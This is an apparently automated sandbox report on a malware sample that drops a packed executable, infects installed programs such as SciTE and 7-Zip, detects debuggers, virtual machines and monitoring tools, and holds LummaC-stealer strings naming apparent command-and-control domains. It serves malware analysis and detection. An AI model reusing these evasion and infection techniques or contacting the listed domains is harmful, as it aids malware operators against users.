Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 0.9941202546453066
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 1.0038910505836576
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 0.9985546038543898
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 0.9984027121296085

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@8/1

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_0032119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_0032119F

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5352

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

File created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Lisect_AVT_24003_G1A_72.exe

Virustotal: Detection: 86%

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe"
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Lisect_AVT_24003_G1A_72.exe

Static file information: File size 4900864 > 1048576

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x383026

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Unpacked PE file: 2.2.jawuwAtX.exe.320000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: #bu

PE file contains sections with non-standard names

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: .imports
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: .themida
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: .boot
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: #bu
Source: jawuwAtX.exe.0.dr	Static PE information: section name: .aspack
Source: jawuwAtX.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00321638 push dword ptr [00323084h]; ret	2_2_0032170E
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00326014 push 003214E1h; ret	2_2_00326425
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00322D9B push ecx; ret	2_2_00322DAB
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_0032600A push ebp; ret	2_2_0032600D

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: entropy: 7.9668438970178
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: #bu entropy: 6.935155293246564
Source: jawuwAtX.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.934455585546093
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.934357838115891
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.9340336005643985

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	File created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204	Thread sleep time: -30000s >= -30000s			Jump to behavior

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00321718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00321754h

2_2_00321718

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_003229E2

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00322B8C

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4=
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001041000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001041000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0T
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process queried: DebugObjectHandle	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: strainriskpropos.stor
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: telephoneverdictyow.site
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: punchtelephoneverdi.stor
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: smallrabbitcrossing.site
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: snuggleapplicationswo.fun
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: theoryapparatusjuko.fun
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: healthproline.pro

Source: SciTE.exe.2.dr

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00321718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

2_2_00321718

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

